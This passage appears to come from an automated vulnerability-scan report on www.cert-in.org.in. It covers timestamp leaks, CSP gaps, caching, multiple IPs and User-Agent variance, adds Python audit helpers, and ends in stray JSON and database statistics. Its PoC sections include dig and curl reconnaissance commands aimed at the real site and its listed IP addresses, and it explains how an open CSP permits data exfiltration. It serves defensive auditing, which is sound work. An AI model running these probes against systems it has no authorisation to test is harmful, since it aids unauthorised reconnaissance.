Such indicators can expose scheduling routines or reveal stale content updates, providing insight into operational cadence.\n\n**Attack Scenario (Proof of Concept)**\nXML element shows the generation time (an ISO 8601 date rather than a Unix integer; the scanner's ten-digit match should be confirmed separately):\n```xml\n<lastmod>2024-04-05T12:34:56+00:00</lastmod>\n```\nAttackers infer update intervals and attempt to predict next regeneration events.\n\n**Business Impact**\nNegligible immediate risk, yet cumulative data points enhance adversary situational awareness and targeting precision.\n\n---\n\n#### Content Security Policy Configuration / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 3.1 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N) |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe `default-src` directive is absent from the main page's Content-Security-Policy header. `default-src` is the fallback for every fetch directive that is not written out (`connect-src`, `style-src`, `font-src`, `frame-src`, `object-src`, `media-src`, `worker-src` and so on), so without it each of those content categories is unrestricted and the policy's XSS mitigation is correspondingly weaker. Note that `base-uri`, `form-action` and `frame-ancestors` never fall back to `default-src` and must be set explicitly regardless.\n\n**Attack Scenario (Proof of Concept)**\nNo `default-src` defined:\n```\nContent-Security-Policy: script-src 'self'; img-src *\n```\nThis allows images from any source and leaves every unlisted fetch directive unrestricted: `<iframe>`, `<object>`, stylesheet and font loads from any origin are permitted, and `connect-src` is open, so any script that does execute under `script-src 'self'` (for example through a vulnerable self-hosted library) can exfiltrate data to any destination. A conservative baseline is `default-src 'self'` followed by explicit exceptions.\n\n**Business Impact**\nPartial CSP implementation offers limited protection and creates false confidence in security posture, especially concerning modern web threats reliant on multi-vector payloads.\n\n---\n\n### Informational Findings\n\n#### Multiple IPs Found / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe asset resolves to multiple IP addresses: 103.218.109.197, 14.139.54.229, and 59.176.167.109. The three addresses sit in different address ranges, which is consistent with DNS round-robin across separately hosted servers rather than a single load-balancer address; each host may therefore carry its own configuration. 
While not inherently a vulnerability, identifying multiple endpoints can provide attackers with additional reconnaissance vectors, including potential bypasses if some servers are misconfigured differently than others.\n\n**Attack Scenario (Proof of Concept)**\nAn attacker may perform DNS enumeration using tools like `dig` or `nslookup` to resolve all A records associated with the domain:\n```bash\n$ dig A www.cert-in.org.in +short\n103.218.109.197\n14.139.54.229\n59.176.167.109\n```\nSubsequently, they may probe each host directly while keeping the Host header and TLS server name correct, for example with `curl --resolve www.cert-in.org.in:443:103.218.109.197 https://www.cert-in.org.in/`, and compare server banners, security headers, certificates and content across the three hosts to identify version inconsistencies, exposed administrative interfaces, or differing security configurations.\n\n**Business Impact**\nWhile this finding does not pose direct risk, it increases the attack surface by exposing more network endpoints. If any of these IPs host outdated or misconfigured services, it could lead to unauthorized access or service compromise.\n\n---\n\n#### Re-examine Cache-control Directives / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe response carries no `Cache-Control` header that restricts storage (`no-store`, `no-cache`, `must-revalidate` or `private`), so browsers and intermediary proxies are free to store it; with no explicit freshness information, clients may also apply heuristic caching based on `Last-Modified`. For a public page this is largely harmless. 
Without explicit directives like `no-store` or `private`, confidential data may persist beyond its intended scope wherever the same defaults are applied to authenticated or personalised responses.\n\n**Attack Scenario (Proof of Concept)**\nA sensitive API response lacks cache headers:\n```\nHTTP/1.1 200 OK\nContent-Type: application/json\n```\nThe browser stores the response, so it can be retrieved after logout via back-button navigation or history inspection on a shared machine. The fix is `Cache-Control: no-store` on responses that contain per-user data.\n\n**Business Impact**\nPotential privacy violations and unauthorized access to authenticated sessions or personal data stored in local caches.\n\n---\n\n#### Re-examine Cache-control Directives / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nAbsence of cache-control headers on public files like `robots.txt` may cause outdated versions to linger in proxy caches, misleading crawlers about current disallowances or sitemaps.\n\n**Attack Scenario (Proof of Concept)**\nAn older version of `robots.txt` remains cached despite recent changes:\n```\nDisallow: /admin/\n```\nCrawlers keep applying the old rules until the cached copy expires, so newly added or removed exclusions take effect late. Note that `robots.txt` is advisory only: a `Disallow` line asks well-behaved crawlers to stay away, but it also tells an attacker which paths exist, so it must never be relied on as access control.\n\n**Business Impact**\nStale caching affects crawl efficiency and delays the effect of robots changes, which can leave sections indexed (or excluded) longer than intended.\n\n---\n\n#### Re-examine Cache-control Directives / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nLack of cache-control directives on `sitemap.xml` leads to inconsistent propagation across distributed networks. 
Outdated sitemaps may remain active longer than necessary, causing incorrect indexing behaviors.\n\n**Attack Scenario (Proof of Concept)**\nNewly removed pages are still listed in the cached sitemap:\n```xml\n<url><loc>/deprecated-page.html</loc></url>\n```\nSearch bots revisit non-existent URLs repeatedly, generating unnecessary error traffic.\n\n**Business Impact**\nDegraded SEO performance and increased server load due to redundant requests stemming from stale sitemap caches.\n\n---\n\n#### User Agent Fuzzer / www.cert-in.org.in /\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/ |\n\n**Description**\nThe server's response for the main page changed when the request was repeated with different User-Agent strings, which suggests UA-dependent logic such as device-specific rendering or bot handling. The check fires on any difference in the response, including ones caused by per-request nonces, timestamps or CSRF tokens, so each hit needs a manual diff to separate that noise from genuinely different content. Where content does differ, the UA-specific variant may include functionality or debug output that the default variant hides.\n\n**Attack Scenario (Proof of Concept)**\nSending a modified UA string triggers an alternate response:\n```bash\ncurl -H \"User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1)\" https://www.cert-in.org.in/\n```\nIf the server keys behaviour on the UA, the crawler variant may return a different HTML layout or expose elements (links, admin panel fragments) that the browser variant omits; this must be confirmed by diffing the two responses rather than assumed.\n\n**Business Impact**\nUnintended feature toggling or debugging features exposed to the public can facilitate further probing or privilege escalation attempts.\n\n---\n\n#### User Agent Fuzzer / cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in |\n\n**Description**\nBehavioral variance upon altering User-Agent headers suggests conditional rendering or routing logic. 
This pattern often correlates with mobile/desktop switching or bot detection mechanisms.\n\n**Attack Scenario (Proof of Concept)**\nSwitching between desktop and mobile UAs yields distinct responses (the UA values below are placeholders; use real browser strings when reproducing):\n```bash\ncurl -H \"User-Agent: iPhone Safari\" https://www.cert-in.org.in/\ncurl -H \"User-Agent: Chrome Desktop\" https://www.cert-in.org.in/\n```\nComparing the two bodies after stripping per-request values (nonces, tokens, dates) shows whether the templates genuinely diverge or only the dynamic fields changed.\n\n**Business Impact**\nInconsistent delivery models complicate testing coverage and increase the likelihood of undetected vulnerabilities specific to certain clients.\n\n---\n\n#### User Agent Fuzzer / sitemap.xml\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/sitemap.xml |\n\n**Description**\nAltering User-Agent strings while accessing `sitemap.xml` produces varied outputs, suggesting dynamic generation tailored to requester type. Such variability may introduce inconsistencies in search engine indexing workflows.\n\n**Attack Scenario (Proof of Concept)**\nDifferent sitemaps are returned depending on UA:\n```bash\ncurl -H \"User-Agent: Bingbot\" https://www.cert-in.org.in/sitemap.xml\ncurl -H \"User-Agent: Firefox\" https://www.cert-in.org.in/sitemap.xml\n```\nEach call returns different `<urlset>` contents.\n\n**Business Impact**\nFragmented sitemap delivery hampers unified crawling strategies and introduces ambiguity in content governance.\n\n---\n\n#### User Agent Fuzzer / robots.txt\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/robots.txt |\n\n**Description**\nResponses differ when querying `robots.txt` with various User-Agents, implying that the server serves a different file per crawler identity rather than a single static file. 
Misconfigurations here can result in unintended exclusions or exposures.\n\n**Attack Scenario (Proof of Concept)**\nThe file served to one crawler carries rules that others do not see:\n```txt\nUser-agent: Googlebot\nDisallow: /private/\n\nUser-agent: *\nAllow: /\n```\n`robots.txt` is advisory: a client that simply ignores it, or presents a different User-Agent, is not restricted at all, and the `Disallow` entry itself hands an attacker a path to probe. Per-UA variants also make it harder to know which rules any given crawler actually received.\n\n**Business Impact**\nMisaligned robot directives affect crawl permissions and expose unintended directories to automated scanners.\n\n---\n\n#### User Agent Fuzzer / Images Directory\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | N/A |\n| Category | web_vulnerability |\n| Asset / URL | https://www.cert-in.org.in/Images |\n\n**Description**\nAccessing the `/Images` directory with altered User-Agent strings results in differing responses (status, size or body). This inconsistency may point to environment-specific deployments or legacy configurations, and should be checked for a variant that returns a directory index.\n\n**Attack Scenario (Proof of Concept)**\nDirectory listing enabled for only one class of client (hypothetical):\n```bash\ncurl -H \"User-Agent: Android Browser\" https://www.cert-in.org.in/Images/\n```\nWith such a misconfiguration this request returns the full index instead of a 403 or 404; confirm by comparing status codes and bodies across several UAs before reporting it as more than informational.\n\n**Business Impact**\nExposure of directory contents increases the risk of discovering backup files, temporary uploads, or development artifacts.",
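The two CSP findings above (missing `base-uri`, missing `default-src`) both come down to which directives fall back to `default-src` and which do not, and to what an injected `<base>` does to relative URLs. The following is an added example, not code from the report or from cert-in.org.in: it parses a policy, reports every directive left unrestricted using the CSP Level 3 fallback rules (so it is general, not limited to the two directives named in the report), and shows how `/js/main.js` resolves before and after a `<base>` injection. The weak policy is the report's own illustrative header; the hardened policy and the attacker origin are hypothetical.

```python
"""CSP fallback audit and <base> injection demonstration.

Added example for the base-uri and default-src findings; not the report's
code.  WEAK is the report's illustrative header, HARDENED is a hypothetical
corrected policy, INJECTED_BASE is a hypothetical attacker origin."""
from __future__ import annotations
from urllib.parse import urljoin

# For each fetch directive, the directives consulted (in order) when it is
# absent (CSP Level 3).  Anything not in this table, such as base-uri,
# form-action and frame-ancestors, has no fallback: omitting it means open.
FALLBACK = {
    "child-src": ["default-src"],
    "connect-src": ["default-src"],
    "font-src": ["default-src"],
    "frame-src": ["child-src", "default-src"],
    "img-src": ["default-src"],
    "manifest-src": ["default-src"],
    "media-src": ["default-src"],
    "object-src": ["default-src"],
    "script-src": ["default-src"],
    "script-src-elem": ["script-src", "default-src"],
    "script-src-attr": ["script-src", "default-src"],
    "style-src": ["default-src"],
    "style-src-elem": ["style-src", "default-src"],
    "style-src-attr": ["style-src", "default-src"],
    "worker-src": ["child-src", "script-src", "default-src"],
}
NO_FALLBACK = ["base-uri", "form-action", "frame-ancestors"]


def parse_csp(header: str) -> dict[str, list[str]]:
    """Parse 'name src src; name src' into {name: [sources]}.  Names are
    case-insensitive and, as in browsers, a repeated directive is ignored
    (the first occurrence wins)."""
    policy = {}
    for token in header.split(";"):
        parts = token.split()
        if parts:
            policy.setdefault(parts[0].lower(), parts[1:])
    return policy


def effective_sources(policy: dict[str, list[str]], directive: str):
    """Source list that actually governs `directive`, or None if nothing does."""
    for name in [directive] + FALLBACK.get(directive, []):
        if name in policy:
            return policy[name]
    return None


def audit_csp(header: str) -> list[str]:
    """List every directive the policy leaves unrestricted."""
    policy = parse_csp(header)
    findings = []
    open_fetch = sorted(d for d in FALLBACK if effective_sources(policy, d) is None)
    if open_fetch:
        findings.append("no default-src fallback; unrestricted: " + ", ".join(open_fetch))
    for d in NO_FALLBACK:
        if d not in policy:
            findings.append(f"no {d} (never inherits from default-src)")
    return findings


def resolve_with_base(document_url: str, base_href: str | None, ref: str) -> str:
    """Where a reference resolves, with or without an injected <base href>.
    Only relative references move; absolute URLs are unaffected."""
    base = urljoin(document_url, base_href) if base_href else document_url
    return urljoin(base, ref)


WEAK = "script-src 'self'; img-src *"                       # the report's example header
HARDENED = ("default-src 'self'; img-src *; base-uri 'self'; "
            "form-action 'self'; frame-ancestors 'none'")   # hypothetical fix
SITE = "https://www.cert-in.org.in/report"                  # hypothetical page URL
INJECTED_BASE = "https://attacker-controlled-site.com/"     # attacker origin from the PoC

if __name__ == "__main__":
    for label, pol in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_csp(pol) or ["no gaps"])
    for ref in ("/js/main.js", "submit-report", "https://www.cert-in.org.in/x"):
        print(ref, "->", resolve_with_base(SITE, None, ref),
              "| with <base>:", resolve_with_base(SITE, INJECTED_BASE, ref))
```

Run against the weak header the audit lists `connect-src`, `object-src`, `style-src` and the rest as open and flags all three non-inheriting directives; `worker-src` is not listed because it falls back to `script-src`. The resolution check shows the point made in the finding: with `<base>` injected, `/js/main.js` and `submit-report` move to the attacker's origin while an absolute URL stays put.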
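The three Timestamp Disclosure findings above rest on a pattern match for ten-digit integers, and the dates they quote come in three different forms (Unix epoch, HTTP-date, ISO 8601). The following is an added example, not code from the report: it decodes every ten-digit candidate in a response, keeps only those that fall in a plausible window around the scan date, and normalises the HTTP-date and `<lastmod>` forms to UTC, including a weekday consistency check for HTTP-dates. The response body, the scan date and the second HTTP-date sample are constructed; the value 1712345678 is the report's own.

```python
"""Triage for Unix-timestamp disclosure hits.

Added example; not the report's code.  BODY and NOW are constructed test
data; 1712345678 is the value from the report's PoC."""
from __future__ import annotations
import re
from datetime import datetime, timedelta, timezone
from email.utils import parsedate_to_datetime

# A ten-digit run not glued to other digits or a dot, so IPv4 octets and
# dotted version strings are not cut up into candidates.
TEN_DIGITS = re.compile(r"(?<![\d.])(\d{10})(?![\d.])")


def find_unix_timestamps(text: str, now: datetime, past_years: int = 10,
                         future_days: int = 365) -> list[tuple[str, str, bool]]:
    """Return (match, decoded UTC time, plausible) for every ten-digit run.
    'plausible' means the value lands between past_years ago and future_days
    ahead of `now`; anything else is almost certainly an id, a phone number or
    a hash fragment rather than a clock value."""
    lo = now - timedelta(days=365 * past_years)
    hi = now + timedelta(days=future_days)
    hits = []
    for m in TEN_DIGITS.finditer(text):
        when = datetime.fromtimestamp(int(m.group(1)), tz=timezone.utc)
        hits.append((m.group(1), when.isoformat(), lo <= when <= hi))
    return hits


def confirmed_timestamps(text: str, now: datetime) -> list[str]:
    """Only the candidates worth putting in a report."""
    return [value for value, _, plausible in find_unix_timestamps(text, now) if plausible]


def check_http_date(value: str) -> tuple[str, bool, str]:
    """Parse an HTTP-date such as Last-Modified and verify its weekday field.
    The parser ignores the weekday, but a mismatch betrays a hand-edited or
    fabricated value.  Returns (UTC ISO time, weekday consistent, real weekday)."""
    when = parsedate_to_datetime(value).astimezone(timezone.utc)
    claimed = value.split(",", 1)[0].strip()
    actual = when.strftime("%a")
    return when.isoformat(), claimed == actual, actual


def normalise_lastmod(value: str) -> str:
    """Sitemap <lastmod> values are ISO 8601 with an offset; return UTC."""
    return datetime.fromisoformat(value).astimezone(timezone.utc).isoformat()


NOW = datetime(2026, 5, 20, tzinfo=timezone.utc)   # constructed scan date
# Constructed response body: one real timestamp, two ten-digit non-timestamps.
BODY = ('{"generated_at": 1712345678, "order_id": 4812345678, '
        '"support": "9876543210", "build": "1.12.0", "node": "203.0.113.10"}')

if __name__ == "__main__":
    for value, when, plausible in find_unix_timestamps(BODY, NOW):
        print(value, "->", when, "plausible" if plausible else "reject")
    print(check_http_date("Wed, 05 Apr 2024 12:34:56 GMT"))   # constructed: wrong weekday
    print(normalise_lastmod("2024-04-05T18:04:56+05:30"))
```

On the constructed body only `1712345678` survives (it decodes to 2024-04-05T19:34:38Z); the order id and phone number decode to the 22nd and 23rd centuries and are dropped, which is exactly the noise that makes this scanner rule unreliable without confirmation. The HTTP-date check reports that 5 April 2024 was a Friday, so a header claiming `Wed` is inconsistent.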
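The "Multiple IPs Found" and "User Agent Fuzzer" findings above both need the same follow-up: fetch the same resource under different conditions (per resolved address, or per User-Agent), strip values that legitimately change on every request, and see whether anything real remains. The following is an added example, not code from the report or from cert-in.org.in. It builds the `curl --resolve` commands for the three addresses the report lists, and then compares constructed responses offline: two hosts that differ only by CSP nonce and a timestamp (no real drift), a third that lacks HSTS and serves an extra link, and two User-Agent variants that differ only in nonce. No network access is made; the response texts are constructed, not captured traffic.

```python
"""Per-host and per-User-Agent response comparison with noise stripped.

Added example; not the report's code.  HOST and IPS come from the report;
every response below is constructed for the demonstration."""
from __future__ import annotations
import hashlib
import re

HOST = "www.cert-in.org.in"
IPS = ["103.218.109.197", "14.139.54.229", "59.176.167.109"]


def probe_commands(host: str, ips: list[str], user_agent: str | None = None) -> list[str]:
    """curl lines that pin each request to one address while keeping the Host
    header and TLS SNI correct, so hosts are compared like for like."""
    ua = f' -A "{user_agent}"' if user_agent else ""
    return [f"curl -sS -D - --resolve {host}:443:{ip}{ua} https://{host}/" for ip in ips]


# Values that change per request and must not count as drift.
VOLATILE = [
    (re.compile(r"'nonce-[A-Za-z0-9+/=]+'"), "'nonce-X'"),        # CSP header nonce
    (re.compile(r'nonce="[^"]*"'), 'nonce="X"'),                   # <script nonce>
    (re.compile(r'name="(csrf|_token)[^"]*" value="[^"]*"'), r'name="\1" value="X"'),
    (re.compile(r"\b1[6-9]\d{8}\b"), "EPOCH"),                     # epoch values 2020-2033
]


def normalise(text: str) -> str:
    for pattern, repl in VOLATILE:
        text = pattern.sub(repl, text)
    return text


def split_response(raw: str) -> tuple[dict[str, str], str]:
    """Split a raw HTTP response into (normalised headers, body)."""
    head, _, body = raw.partition("\n\n")
    headers = {}
    for line in head.splitlines()[1:]:          # skip the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = normalise(value.strip())
    return headers, body


def fingerprint(body: str) -> str:
    return hashlib.sha256(normalise(body).encode()).hexdigest()[:12]


def group_by_content(responses: dict[str, str]) -> dict[str, list[str]]:
    """Labels (addresses or UAs) grouped by normalised body; one group means
    the scanner's 'difference' was only per-request noise."""
    groups = {}
    for label, raw in responses.items():
        groups.setdefault(fingerprint(split_response(raw)[1]), []).append(label)
    return groups


def header_drift(responses: dict[str, str],
                 names=("server", "strict-transport-security",
                        "content-security-policy", "x-frame-options")) -> dict[str, dict]:
    """Security-relevant headers whose value is not identical everywhere."""
    per_label = {label: split_response(raw)[0] for label, raw in responses.items()}
    drift = {}
    for name in names:
        values = {label: hdrs.get(name) for label, hdrs in per_label.items()}
        if len(set(values.values())) > 1:
            drift[name] = values
    return drift


def sample(server: str, hsts: str | None, nonce: str, epoch: int, extra_html: str = "") -> str:
    """Constructed HTTP response for the demo (not captured traffic)."""
    hsts_line = f"strict-transport-security: {hsts}\n" if hsts else ""
    return ("HTTP/1.1 200 OK\n" f"server: {server}\n" f"{hsts_line}"
            f"content-security-policy: script-src 'self' 'nonce-{nonce}'\n\n"
            f'<html><head><script nonce="{nonce}">init({epoch})</script></head>'
            f'<body><a href="/report">Report an incident</a>{extra_html}</body></html>')


RESPONSES = {
    IPS[0]: sample("nginx", "max-age=31536000", "a1b2", 1716190598),
    IPS[1]: sample("nginx", "max-age=31536000", "c3d4", 1716190601),
    IPS[2]: sample("Apache/2.4.6", None, "e5f6", 1716190603, '<a href="/admin/">Admin</a>'),
}
UA_RESPONSES = {
    "Mozilla/5.0 (X11; Linux x86_64) Firefox/126.0": sample("nginx", "max-age=31536000", "q1", 1716190610),
    "Mozilla/5.0 (compatible; Googlebot/2.1)": sample("nginx", "max-age=31536000", "q2", 1716190612),
}

if __name__ == "__main__":
    print("\n".join(probe_commands(HOST, IPS)))
    print("content groups:", group_by_content(RESPONSES))
    print("header drift:", header_drift(RESPONSES))
    print("UA groups:", group_by_content(UA_RESPONSES))
```

For the constructed data the first two addresses collapse into one content group and the third stands alone, and the header comparison names exactly what drifted (`server` and the missing `strict-transport-security`); the CSP header is not reported because only its nonce differed. The two User-Agent variants fall into a single group, which is the outcome to expect from most "User Agent Fuzzer" hits and the reason they stay informational until a diff shows otherwise. The `VOLATILE` list is a starting point; extend it with whatever per-request values the target emits.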
"summary": {
"total": 23
}
}
|
{
"total": 23
}
|
|
6a1f302ecdcdcbd0a53116bf
|
Tue Jun 02 2026 19:34:06 GMT+0000 (Coordinated Universal Time)
|
generate_web_vulnerability_report
|
*** LARGE PROPERTY ***
~114 KB Preview:{"url":"https://onmark.co |
{
"total": 59
}
|
| Documents | 9 |
| Total doc size | 131.1 KB |
| Average doc size | 14.57 KB |
| Pre-allocated size | 136 KB |
| Indexes | 1 |
| Total index size | 36 KB |